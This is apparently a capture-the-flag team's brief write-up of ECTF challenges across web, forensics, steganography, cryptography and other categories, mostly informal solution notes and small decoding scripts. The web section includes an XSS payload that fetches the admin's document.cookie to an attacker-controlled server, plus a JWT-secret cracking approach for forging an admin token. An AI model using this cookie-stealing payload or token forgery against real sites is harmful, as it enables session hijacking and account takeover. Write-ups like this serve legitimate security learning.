# ECTF - ICC Pisang Molen
We got #8 on ECTF (https://ectf.fr), thanks to our team Ziru, Don Neto, and Mage. CLARIFICATIONS: WILL UPDATE THE PROPER WRITEUP SOON
## Web
### Java Weak Token - 200 Points
In this challenge, we can do cookie poisioning because of the weak JWT secret. Achieve the secret by John The Ripper, and change our token to admin.
### Chat With The Admin - 200 Points
The key points is that Admin visits our site every 30 seconds. based on our findings, we can inject a script to the website. it means that we can do XSS to make admin fetch our url and send their cookie by script
```js!
<script>fetch('server?ziru='+document.cookie)</script>
```
after that just change our cookie to admin and ggs
## Forensic
### My Dearest - 100 Points
In this challenge, we’re given a DOCX file, and the task is to identify the creator. By using exiftool, we were able to find the creator’s name in the metadata.
Flag: ectf{Michel_Teller}
### Just A PCAP - 500 Points
In this challenge, we were given a PCAP file with the task of finding a PNG file. Upon inspecting the file, we noticed a pattern resembling the PNG hex structure. We exported the relevant data to a .txt file, cleaned out unnecessary characters, then converted it into a .png file. The extracted image contained the flag.
### CAPTURE THE HIDDEN - 200 Points
After analyzing the pcap, actually this challenge was so simple, there is a base64 encoded message as a data parameter on the post http stream.
### 3 questions, 3 answers (upsolved) - 500 Points
In this challenge, we received a .zip file. After extracting its contents, we found a .vhd disk image file. To analyze the disk, we loaded it into FTK Imager for further investigation. The task was to find the answers to security questions. Based on some information I found, the SAM registry file, which stores security question data, can be located in the following directory:
[root]/Windows/System32/config/SAM.
We focused on this path to extract the relevant information.
Flag: ectf{Lulu.Prague.Peter}
### WHERE WHEN HOW (upsolved) - 500 Points
In this challenge, we were given a .mem file to analyze. The goal was to find details about a planned trip. I used Volatility to examine the memory dump, and after randomly searching through strings, I discovered browsing history related to the trip on Bing.
To narrow down the results, I used grep to filter specifically for Bing browsing history, which helped reveal the relevant information.
e":"OfferSegmentStation","city":{"typename":"CodeName","name":"Budapest"},"code":"BUD","name":"Liszt Ferenc International"},"ar
rivalDateTime":"2025-01-24T21:40:00","departureDateTime":"2025-01-24T19:25:00","duration":135,"equipmentType":"AIRCR
AFT","dateVariation":0,"origin":{"typename":"OfferSegmentStation","code":"CDG","name":"a
roport Paris-Charles de Gaulle"},"arrivalDateTime":"2025-02-22T21:00:00","departureDateTime":"2025-02-22T18:35:00","
duration":145,"equipmentType":"AIRCRAFT","dateVariation":0,"origin":{"__typename":"OfferSegmentStation","code":"BUD","n
Flag: ectf{Budapest.2025/01/24-2025/02/22.Plane}
### Find my favorite city (upsolved) - 500 Points
In this challenge, we were given a usb.image file with the task of recovering deleted photos. To accomplish this, we used PhotoRec, a data recovery tool designed to retrieve lost files from disk images. By running PhotoRec on the usb.image file, we were able to successfully recover the deleted photos.
The challenge provided a hint to pay attention to the wallpaper.
After that we exiftool the wallpaper and got password
We also searched for files that required a password. During the investigation, we found a ZIP file located in the Documents folder that was password-protected. We needed to obtain the passcode to unzip and access its contents.
Flag: ectf{Kozlany}
## Steganography
### The Island's Treasure - 200 Points
Given a PNG image, aperisolve and exiftool to get secret 1 and 2. and then used open stego to get the hidden img containing flag
### Definitely Not In The PDF - 100 Points
Just unzip in kali linux wsl and gg boys round secured
### Chill Plankton - 300 Points
Analyze the sound to get secret code (whispered at some points) -> use secret code on youtube -> download the mp3 of video and look at the spectogram
### Silhoutte in Cyberpunk - 200 Points
Had overthink this chall but its simple. Construct braille from the left building lighting -> dcode braille
## Cryptography
### Hashes Binder - 200
To crack the excel password, we can brute force by using wordlist.txt (there might be tools, but I only use Python code).
After we crack the password, we can see the three parts in the excel file. Part 1 uses https://hashes.com/en/tools/hash_identifier to identify the hash type. Once we know that, we can just use the type https://online-tools.bmreducation.com/encrypt-decrypt/gost. Part 2 only uses base58, Part 3 only uses base64. After that you can combine them following the format. The password for the zip is “dolphin_spooky_digestive_prescription”.
### Never Two Without Three - 500
Using cyberchef ROT13 (try changing the number of shifts) and magic to get the flag.
### ASCII Me Anything But Not The Flag - 150 Points
Using ASCII Converter dcode.fr and we will see the cipher flag and key. Using the Vigenere Cipher dcode.fr with the key “HBVHBV”.
### OIIAIOIIIAI 😼 - 200 Points
Check the ciphertext carefully and you will understand how to get the flag (a multiple of 2 from string[1] and its reverse).
```python
a = "}eYcbt4fB{_yD0nUu_05Rp_1TNh_GM13R_"
for i in range(1, len(a), 2):
print(a[i], end="")
for i in range(len(a)-2, -1, -2):
print(a[i], end="")
```
### Cracking the Vault - 250 Points
Check the codes carefully and you will realize that some codes are not used.
```python!
def encryption(text):
encrypted = []
# random = secrets.SystemRandom()
# padding_length = 256 - len(text) % 256
# raw_padding = [chr(random.randint(32, 126)) for _ in range(padding_length)]
# scrambled_padding = [chr((ord(c) * 3 + 7) % 94 + 32) for c in raw_padding]
# shifted_padding = scrambled_padding[::-1]
# padded_text = ''.join(shifted_padding) + text
# final_padded_text = ''.join(
# chr((ord(c) ^ 42) % 94 + 32) if i % 2 == 0 else c
# for i, c in enumerate(padded_text)
# )
# secret_key = str(sum(ord(c) for c in text))
# secret_key = secret_key[::-1]
# hashed_key = hashlib.sha256(secret_key.encode()).hexdigest()
# seed = int(hashed_key[:16], 16)
# random = secrets.SystemRandom(seed)
for i, char in enumerate(text):
char_code = ord(char)
shift = (i + 1) * 3
transformed = (char_code + shift + 67) % 256
encrypted.append(chr(transformed))
return ''.join(encrypted), 0
def decryption(encrypted_text):
decrypted = []
for i, char in enumerate(encrypted_text):
char_code = ord(char)
shift = (i + 1) * 3
transformed = (char_code - shift - 67) % 256
decrypted.append(chr(transformed))
return ''.join(decrypted)
with open('VaultKey_encrypted.bin', 'rb') as f:
encrypted_text = f.read().decode()
decrypted_text = decryption(encrypted_text)
print(decrypted_text)
```
### RSA Intro - 250 Points
Just use factordb on n and decrypt as usual.
```python!
from Crypto.Util.number import *
n = 1184757578872726401875541948122658312538049254193811194706693679652903378440466755792536161053191231432973156335040510349121778456628168943028766026325269453310699198719079556693102485413885649073042144349442001704335216057511775363148519784811675479570531670763418634378774880394019792620389776531074083392140830437849497447329664549296428813777546855940919082901504207170768426813757805483319503728328687467699567371168782338826298888423104758901089557046371665629255777197328691825066749074347103563098441361558833400318385188377678083115037778182654607468940072820501076215527837271902427707151244226579090790964814802124666768804586924537209470827885832840263287617652116022064863681106011820233657970964986092799261540575771674176693421056457946384672759579487892764356140012868139174882562700663398653410810939857286089056807943991134484292518274473171647231470366805379774254724269612848224383658855657086251162811678080812135302264683778545807214278668333366983221748107612374568726991332801566415332661851729896598399859186545014999769601615937310266497300349207439222706313193098254004197684614395013043216709335205659801602035088735521560206321305834999363607988482888525092210585343868702766655032190348593070756595867719633492847013620378010952424253098519859359544101947494405255181048550165119679168071637363387551385352023888031983210940358096667928019837327581681936262186049576626435407253113152851511562799379477905913074052917135254673527350886619693800827592241738185465519368503599267554966329609741719839452532720121891782656000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001
e = 65537
c = 393830705821083872264416484945379590743951209334251680140561629963083955435155434968501995173717065691853716117413549060471633713246813706134614822460487831949312719410922980049951577395596254279195364667821988767675462852220254638390252652391863031378262058213973374365653466528787640726441241664538814924465041415751207617994829099967542528845558372954608772395722055861369383117996161988362298650918468621344968162697585757444815069821774651095279049590140325395770490299618719676066106689396243767847620065054763147901166291755102218540290732819710294120101688593205036339603152228827861450774360237006971191234350634731104643779249017990427055169232234892324512234471025984131134122883594190002695857381320761826426970820621555957081409595866374650139218172798735536295519361258955868218458841069870611367807353745731928726480481254620623949030522228724677423429285228917983167742866068764059333196595815029550909470984427785123479796787934189869159245455191142352654087327876642690754428041545205764160668875253155015956045237338532248073834631989395905208181116526111301051883717335829373670674970007067708289628731972707477338551521585672558157829354894929466723788269911067380887281008564055766243843557738727000164255990684153972958815292767702154995098383096546576559199090417518282978657504210433584144451378874050676287588884988934683793378300065910040270282398699691108573435112129408980056605713259535036581461672565785674329469547540861581715756111296028940885214170609934085009608200810707122173370006290459841638659407675519141544675968270051746963709729460531469035621873301953785282870733516854080405064440750450304537433849449545664331761838457477121677018421695909336075840076436991397964264703526101810961378256559625011198775706699
# factordb
p=5054843
q = n // p
d = inverse(e, (p-1)*(q-1))
pt = pow(c,d,n)
print(long_to_bytes(pt))
```
## Misc
### Lightspeed Puzzle
Rearrange the grid from 0_0 to 9_9 and then read the code.
### Terraria Where's Waldo
Just search for waldo and got a painting with chest. Look at the chest and then see the content.
### Extraction Mission Heart of The Vault
Use bash script to crack the 200 nested zip with john. after that just do reverse engineering.
### Math
~~You need to be chinese to solve this~~. Using geogebra, you can get the equation of the heart shape like the image given. But we need to scale it so that the coordinates reach (0, ±10) and (±10, 0). So the equation is as follows.
## Osint
Cape, malas, traumatic. pokoknya jadi tour guide france, pake gpt, utilize every hint, gg boys round secured.
## Hardware
### Orbit - 100 Points
Attend digital system class
### Its Trivial - 200 Points
Attend digital system class
### Elec - 250 Points
Just ask the Chinese AI and you will get an A and B. But for B, since the description wants “Practical Value”, you need to round up or down (3459,6 -> 3450).
Google Drive
Gist
Clipboard
Sign in with Wallet
